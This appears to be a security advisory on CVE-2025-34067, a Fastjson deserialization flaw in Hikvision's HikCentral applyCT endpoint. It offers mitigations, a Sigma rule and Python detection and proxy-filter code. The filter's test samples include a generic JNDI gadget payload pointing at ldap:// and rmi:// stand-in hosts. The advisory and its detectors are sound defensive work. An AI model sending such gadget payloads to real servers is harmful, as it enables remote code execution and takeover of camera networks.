What is the HIKVISION ApplyCT Vulnerability and How Does It Impact Surveillance Devices?
The HIKVISION ApplyCT vulnerability (CVE-2025-34067) is a critical remote code execution flaw in the HikCentral Integrated Security Management Platform. It lets an unauthenticated attacker execute arbitrary code on the HikCentral server by exploiting unsafe deserialization in the outdated Fastjson library used by the applyCT endpoint. With a CVSS score of 10.0, the flaw puts the millions of Hikvision cameras, DVRs and NVRs that HikCentral manages within reach of whoever compromises that server, with full system control and data leakage as the realistic outcomes. It is a reminder that management platforms must be patched as urgently as the devices they control, and that third-party libraries need the same scrutiny as first-party code.
Table of Contents
- At‑a‑Glance Vulnerability Table
- Timeline
- Technical Deep Dive
- Real‑World Impact Scenarios
- Mitigation Guidance
- Detection Rules (Sample Sigma Snippet)
- Lessons for Security Teams
- Conclusion
- Frequently Asked Questions (FAQs)
A newly disclosed flaw in HIKVISION’s HikCentral Integrated Security Management Platform allows unauthenticated remote code execution (RCE) through the /bic/ssoService/v1/applyCT endpoint. Tracked as CVE‑2025‑34067 (CVSS 10.0), the bug stems from unsafe deserialization in an outdated copy of the Fastjson library. A single network request is enough to take over the HikCentral server, and with it the millions of IP cameras, DVRs and NVRs that such servers centrally manage.
At‑a‑Glance Vulnerability Table
| Field | Detail |
|---|---|
| CVE / Alias | CVE‑2025‑34067 |
| Severity | Critical (CVSS 4.0 base score 10.0) |
| Affected Product | HikCentral Integrated Security Management Platform (vulnerable endpoint: /bic/ssoService/v1/applyCT) |
| Attack Vector | Network; no authentication and no user interaction required |
| Root Cause | Deserialization of untrusted data by a vulnerable Fastjson version with auto‑type enabled |
| Impact | Arbitrary command execution as the HikCentral service account on the server host; control of the cameras, DVRs and NVRs it manages |
| Public Exploit? | Proof‑of‑concept code published (JNDI/LDAP gadget chain) |
| Patch / Mitigation | Upgrade to HikCentral 2.5.5 or later; if you cannot upgrade, block /bic/ssoService/* at a reverse proxy or firewall |
| Detection Clues | Unexpected outbound LDAP/RMI connections, remote Java class downloads, or shell processes spawned by the HikCentral Java process |
Timeline
| Date | Event |
|---|---|
| 2025‑06‑30 | Independent researcher reports the bug to Hikvision PSIRT |
| 2025‑07‑02 | CVE‑2025‑34067 reserved; vendor releases hot‑fix advisory |
| 2025‑07‑03 | VulnCheck and other intel feeds publish PoC exploit |
| 2025‑07‑04 | CVE published in NVD with CVSS 10/10 rating |
Technical Deep Dive
- Endpoint: /bic/ssoService/v1/applyCT receives JSON payloads during single sign‑on.
- Vulnerable library: the endpoint parses that JSON with Fastjson 1.2.x with auto‑type enabled, so a client‑supplied @type key decides which Java class gets instantiated.
- Exploit chain:
  1. The attacker sends a malicious JSON body whose @type key names a gadget class and whose properties carry an attacker‑controlled LDAP URL.
  2. Fastjson instantiates that class, which performs a JNDI lookup and loads an attacker‑controlled Java class from the LDAP server.
  3. The loaded class executes arbitrary commands under the HikCentral service account.

Because the body is deserialized before any authentication check runs, the attacker needs no valid credentials. Compromise of the Windows or Linux server hosting HikCentral grants lateral movement into the video network and possibly the corporate LAN.
Real‑World Impact Scenarios
- City Surveillance Hubs: RCE could let attackers disable or loop CCTV feeds during physical intrusions.
- Retail Chains: PoS networks may share VLANs with NVRs; an adversary could pivot to payment systems.
- Critical Infrastructure: utilities using HikCentral for perimeter monitoring risk OT crossover attacks.
Mitigation Guidance
- Upgrade immediately: Hikvision firmware and HikCentral patch 2.5.5 replace Fastjson with Jackson and add strict deserialization whitelists.
- Block the endpoint: if you cannot patch, block or rewrite traffic to /bic/ssoService/ on reverse proxies and firewalls, and confirm the path is not reachable from the internet.
- Isolate video networks: place cameras and NVRs on separate VLANs with no direct internet access, and restrict egress from the HikCentral host so a JNDI callback cannot reach an attacker's LDAP or RMI server in the first place.
- Monitor for IOCs:
  - Outbound ldap://, ldaps:// or rmi:// connections from HikCentral servers to hosts that are not your directory servers
  - Unexpected PowerShell, cmd.exe or Bash processes spawned by the HikCentral Java process
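The "block or rewrite traffic" mitigation above and the exploit chain in the Technical Deep Dive come down to the same thing: the applyCT endpoint must never receive a Fastjson auto-type payload. The following is an added example, not Hikvision's code and not the published PoC, of a pre-filter a reverse proxy in front of HikCentral could apply to JSON bodies for /bic/ssoService/v1/applyCT while an upgrade is pending. The sample bodies are constructed; the gadget shape (a JdbcRowSetImpl whose dataSourceName points at a JNDI URL) is the well-known generic public Fastjson pattern, not the applyCT-specific exploit, and the hostnames use RFC 5737 test addresses.

```python
"""Added example (not Hikvision's code and not the published PoC): a pre-filter
for JSON bodies posted to /bic/ssoService/v1/applyCT, of the kind a reverse
proxy in front of HikCentral could apply while the upgrade is pending.

Fastjson with auto-type enabled honours an "@type" key and instantiates the
named Java class; the public JNDI gadget chains point a property of that class
at an attacker-controlled ldap:// or rmi:// URL. A legitimate SSO request has
no reason to carry "@type", so the filter rejects that key anywhere in the
document and separately flags JNDI URL schemes in any string value, recursing
through nested objects and arrays. The sample bodies below are constructed;
the gadget is the well-known generic Fastjson shape, not the applyCT PoC.
"""
import json
import re
from typing import Any, Iterator, List, Tuple

# URL schemes a JNDI lookup will follow to fetch a remote object or class.
JNDI_SCHEME = re.compile(r"^\s*(ldap|ldaps|rmi|iiop|dns)://", re.IGNORECASE)


def walk(node: Any, path: str = "$") -> Iterator[Tuple[str, Any, Any]]:
    """Yield (json_path, key, value) for every object member, depth first."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield f"{path}.{key}", key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def inspect_body(raw: str) -> List[str]:
    """Return a list of findings for a request body; an empty list means it passes."""
    try:
        doc = json.loads(raw)
    except ValueError as exc:
        # Fail closed: a body the filter cannot parse is not forwarded.
        return [f"unparseable JSON: {exc}"]
    findings = []
    for path, key, value in walk(doc):
        # json.loads has already decoded escapes such as "\u0040type",
        # so an obfuscated key compares equal to "@type" here.
        if key == "@type":
            findings.append(f"{path}: Fastjson auto-type key -> {value!r}")
        if isinstance(value, str) and JNDI_SCHEME.match(value):
            findings.append(f"{path}: JNDI-style URL {value!r}")
    return findings


def should_block(raw: str) -> bool:
    """Proxy decision: True means respond 400 and never forward to HikCentral."""
    return bool(inspect_body(raw))


# Constructed samples (not captured traffic). Hosts use RFC 5737 test addresses.
BENIGN = json.dumps({"userName": "operator", "ticket": "st-3f9c2a",
                     "redirect": "https://hikcentral.example.internal/portal"})
GADGET = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
          '"dataSourceName":"ldap://192.0.2.10:1389/Exploit","autoCommit":true}')
NESTED = ('{"user":{"profile":[{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl",'
          '"dataSourceName":"rmi://192.0.2.10:1099/x"}]}}')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("gadget", GADGET), ("nested", NESTED)):
        print(name, "BLOCK" if should_block(body) else "PASS", inspect_body(body))
```

The filter is deliberately strict: it rejects any @type key rather than maintaining a blocklist of gadget classes, because Fastjson bypasses have historically come from new classes, not new syntax. It is a stop-gap for the window before the upgrade, not a replacement for removing the vulnerable parser.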
Detection Rules (Sample Sigma Snippet)
```yaml
title: Hikvision HikCentral applyCT Fastjson Exploit - Shell Spawned by Java
status: experimental
description: >
  Detects a command shell or script interpreter launched by the Java process
  hosting HikCentral, the post-exploitation step expected from a Fastjson/JNDI
  gadget. Correlate hits with POSTs to /bic/ssoService/v1/applyCT in the web log.
logsource:
  product: windows
  service: security
detection:
  selection_parent:
    EventID: 4688
    ParentProcessName|endswith: '\java.exe'
  selection_child:
    NewProcessName|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Maintenance scripts legitimately launched by the HikCentral service
level: critical
```

The exploit payload travels in the HTTP body, not on the java.exe command line, so the rule keys on the parent/child relationship rather than on strings such as "applyCT" or "ldap://" in CommandLine. Note that event 4688 only carries the parent process name on Windows 8.1 / Server 2012 R2 and later, and includes the command line only when "Include command line in process creation events" is enabled in audit policy.
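To show how the Sigma rule and the two network IOCs from the Mitigation section fit together, here is an added Python example (not from the original post, Hikvision or the Sigma project) that runs the same logic over constructed log records and correlates each hit with a preceding POST to /bic/ssoService/v1/applyCT. The field names mirror 4688 and Sysmon naming, the directory-server allowlist and the five-minute window are assumptions, and all addresses are RFC 5737 test ranges.

```python
"""Added example, not from the original post, Hikvision or the Sigma project:
the Sigma logic above plus the two IOCs from the Mitigation section, run over
constructed log records so the correlation can be tried offline.

Three sources are joined:
  * web server access log lines for POSTs to /bic/ssoService/v1/applyCT
  * Windows 4688 process-creation events (parent and child image names)
  * outbound connection records from the HikCentral host (Sysmon event 3 style)
Field names, the directory-server allowlist and the 5-minute window are
assumptions; adjust them to your own telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\bash.exe")
JNDI_PORTS = {389, 636, 1389, 1099, 1098}   # LDAP, LDAPS and RMI registry ports
KNOWN_LDAP_SERVERS = {"10.0.0.5"}            # assumed: your domain controllers
WINDOW = timedelta(minutes=5)                # assumed correlation window


def ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


@dataclass
class Alert:
    when: datetime
    reason: str
    correlated: bool = False   # True when an applyCT POST preceded it within WINDOW


def shell_from_java(events: List[Dict]) -> List[Alert]:
    """Equivalent of the Sigma rule: a shell whose parent image is java.exe."""
    alerts = []
    for e in events:
        parent = e["ParentProcessName"].lower()
        child = e["NewProcessName"].lower()
        if parent.endswith("\\java.exe") and child.endswith(SHELLS):
            alerts.append(Alert(ts(e["time"]), f"{child} spawned by java.exe: {e['CommandLine']}"))
    return alerts


def jndi_callback(conns: List[Dict]) -> List[Alert]:
    """Outbound LDAP/RMI from the Java process to anything but known directory servers."""
    alerts = []
    for c in conns:
        if (c["Image"].lower().endswith("\\java.exe")
                and c["DestinationPort"] in JNDI_PORTS
                and c["DestinationIp"] not in KNOWN_LDAP_SERVERS):
            alerts.append(Alert(ts(c["time"]),
                                f"java.exe -> {c['DestinationIp']}:{c['DestinationPort']} (possible JNDI lookup)"))
    return alerts


def applyct_requests(access_log: str) -> List[datetime]:
    """Timestamps of POSTs to the vulnerable endpoint (line format: time client method path status)."""
    times = []
    for line in access_log.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[2] == "POST" and parts[3].endswith("/bic/ssoService/v1/applyCT"):
            times.append(ts(parts[0]))
    return times


def correlate(alerts: List[Alert], request_times: List[datetime]) -> List[Alert]:
    """Mark an alert as correlated when an applyCT POST happened at most WINDOW before it."""
    for a in alerts:
        a.correlated = any(timedelta(0) <= a.when - t <= WINDOW for t in request_times)
    return alerts


def run(access_log: str, proc_events: List[Dict], conn_events: List[Dict]) -> List[Alert]:
    alerts = shell_from_java(proc_events) + jndi_callback(conn_events)
    alerts.sort(key=lambda a: a.when)
    return correlate(alerts, applyct_requests(access_log))


# Constructed telemetry (not real captures); 203.0.113.7 and 192.0.2.10 are RFC 5737 addresses.
ACCESS_LOG = """2025-07-03T10:14:02Z 203.0.113.7 POST /bic/ssoService/v1/applyCT 200
2025-07-03T10:20:11Z 10.0.0.42 GET /bic/ssoService/v1/login 200"""
JAVA = "C:\\Program Files\\HikCentral\\jre\\bin\\java.exe"
PROC_EVENTS = [
    {"time": "2025-07-03T09:00:00Z", "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
    {"time": "2025-07-03T10:14:03Z", "ParentProcessName": JAVA,
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]
CONN_EVENTS = [
    {"time": "2025-07-03T10:05:00Z", "Image": JAVA, "DestinationIp": "10.0.0.5", "DestinationPort": 389},
    {"time": "2025-07-03T10:14:02Z", "Image": JAVA, "DestinationIp": "192.0.2.10", "DestinationPort": 1389},
]

if __name__ == "__main__":
    for a in run(ACCESS_LOG, PROC_EVENTS, CONN_EVENTS):
        print(a.when.isoformat(), "CORRELATED" if a.correlated else "uncorrelated", a.reason)
```

On the constructed data the explorer-launched cmd.exe and the LDAP bind to the allowlisted domain controller stay silent, while the java.exe connection to an unknown host on port 1389 and the cmd.exe spawned by java.exe one second after the applyCT POST both fire as correlated alerts. The JNDI connection is the earlier signal of the two, which is why restricting egress from the HikCentral host is listed as a mitigation and not only as a detection.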
Lessons for Security Teams
- Third‑party libraries matter: outdated Fastjson has plagued Java applications for years; an SBOM and routine library scans would have flagged the risk early.
- Zero trust for cameras: treat video systems like untrusted IoT. Use MFA on management consoles and segment them from IT assets.
- Patch the Windows hosts: many HikCentral servers still run Windows Server 2012 R2; combine this flaw with unpatched OS bugs and attackers reach SYSTEM privileges fast.
Conclusion
CVE‑2025‑34067 is a stark reminder that IoT and security‑camera ecosystems can become enterprise footholds. Any organisation running HikCentral should patch or isolate systems now. With public PoC exploits circulating, defenders have a narrow window to get ahead of opportunistic botnets and targeted attackers.
Stay updated through vendor advisories and threat‑intel feeds, and incorporate these lessons into your broader vulnerability‑management and network‑segmentation strategies.
FAQs
What is the HIKVISION ApplyCT vulnerability?
The ApplyCT vulnerability is a critical flaw in the HikCentral platform allowing unauthenticated remote code execution.
What is the CVE ID assigned to the Hikvision vulnerability?
It is CVE-2025-34067, rated with a maximum CVSS score of 10.0.
What does CVSS 10.0 mean for this vulnerability?
A CVSS score of 10.0 indicates the highest severity, meaning full compromise is possible without user interaction.
What platform is affected by this flaw?
The vulnerability affects Hikvision's HikCentral Integrated Security Management Platform, specifically the /bic/ssoService/v1/applyCT endpoint of its single sign-on service.
What is Fastjson and how is it involved?
Fastjson is a Java library used for JSON processing. An outdated and vulnerable version is used in applyCT, leading to this RCE.
Can this vulnerability be exploited remotely?
Yes, it allows remote code execution without authentication.
Does this vulnerability require user interaction?
No, attackers can exploit the flaw without needing any user action.
How many devices are potentially affected?
Millions of surveillance devices managed through HikCentral worldwide. The cameras and recorders are not attacked directly; they fall under the control of whoever compromises the management server.
Who discovered the Hikvision vulnerability?
It was disclosed by security researchers analyzing the HikCentral platform.
What can attackers do if they exploit this flaw?
They can execute arbitrary code, control devices, implant backdoors, or steal data.
Is this vulnerability already being exploited?
As of now there is no confirmed in-the-wild exploitation, but public PoC code exists, so the risk is considered high.
What should Hikvision users do immediately?
They should check for and apply the latest firmware or security patch from Hikvision.
Is there a patch available?
Yes. The mitigation guidance above points to HikCentral 2.5.5 or later; confirm the exact fixed build against Hikvision's advisory before deploying.
Is the vulnerability public?
Yes, the CVE details and nature of the exploit are publicly disclosed.
How can organizations detect exploitation?
Watch the web server log for POSTs to /bic/ssoService/v1/applyCT, outbound LDAP or RMI connections from the HikCentral host to unfamiliar destinations, and shell processes whose parent is the HikCentral Java process.
Can traditional antivirus software block this?
Not reliably. The exploit is a logic flaw inside a legitimate Java process, not a file that matches a malware signature; endpoint detection that flags shells spawned by java.exe is more useful than signature-based antivirus here.
Why is IoT security critical in this context?
IoT devices like surveillance cameras are often overlooked but hold critical data and access paths.
What are the risks of not patching?
Unpatched systems may be hijacked for spying, network pivoting, or DDoS botnets.
Is this a zero-day vulnerability?
No. A zero-day is a flaw that is exploited or disclosed before the vendor has a fix. This one was reported to Hikvision, assigned a CVE and patched, so it is a known, patchable vulnerability; the remaining risk is unpatched installations, especially now that public PoC code is available.
What makes this vulnerability unique?
Its ease of exploitation without authentication and its presence in widely deployed systems.
What is the role of applyCT in HikCentral?
It is the /bic/ssoService/v1/applyCT endpoint of HikCentral's single sign-on service, which accepts JSON payloads during SSO; that JSON is what the vulnerable Fastjson parser deserializes.
What steps can system administrators take?
Audit devices, restrict external access, apply patches, and monitor network behavior.
Is Fastjson widely used?
Yes, and this incident highlights why keeping third-party libraries updated is essential.
Can this be mitigated without patching?
Temporary workarounds like restricting access or disabling exposed services can reduce risk.
Are government entities at risk?
Yes, any organization using Hikvision surveillance systems could be affected.
What industries are most impacted?
Public sector, law enforcement, transportation, and critical infrastructure often use Hikvision products.
Does this affect NVR or DVR systems?
Indirectly. NVRs and DVRs do not run the vulnerable code themselves, but once the HikCentral server that manages them is compromised, the attacker can control them through it.
Can firewalls prevent exploitation?
They can help if configured to block unnecessary external access, but are not foolproof.
How can I verify if my system is vulnerable?
Check the installed HikCentral version against the fixed version in Hikvision's advisory (the mitigation guidance above cites 2.5.5 or later), and confirm whether /bic/ssoService/v1/applyCT is reachable from untrusted networks.
Is Hikvision cooperating with researchers?
Hikvision typically works with security experts to patch known issues after responsible disclosure.
Will this vulnerability appear in future pentesting reports?
Yes, it’s a major vulnerability and will likely be flagged in automated scans or red team audits.